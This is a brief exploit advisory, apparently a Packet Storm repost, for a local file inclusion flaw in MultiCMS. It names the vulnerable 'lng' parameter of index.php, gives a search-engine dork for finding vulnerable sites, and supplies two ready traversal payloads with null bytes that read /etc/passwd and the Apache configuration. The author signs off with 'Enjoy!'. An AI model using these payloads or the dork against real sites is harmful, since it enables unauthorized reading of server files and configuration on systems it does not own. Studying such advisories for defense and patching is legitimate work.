MultiCMS Local File Inclusion Vulnerbility

2011-01-29 09:15:34

Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt

=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcní systém MultiCMS"
# Mail: [email protected]
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
S3T4N a.k.a Zeth.
All My Friends
=============================www[dot]Whiteponny[dot]com=============================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.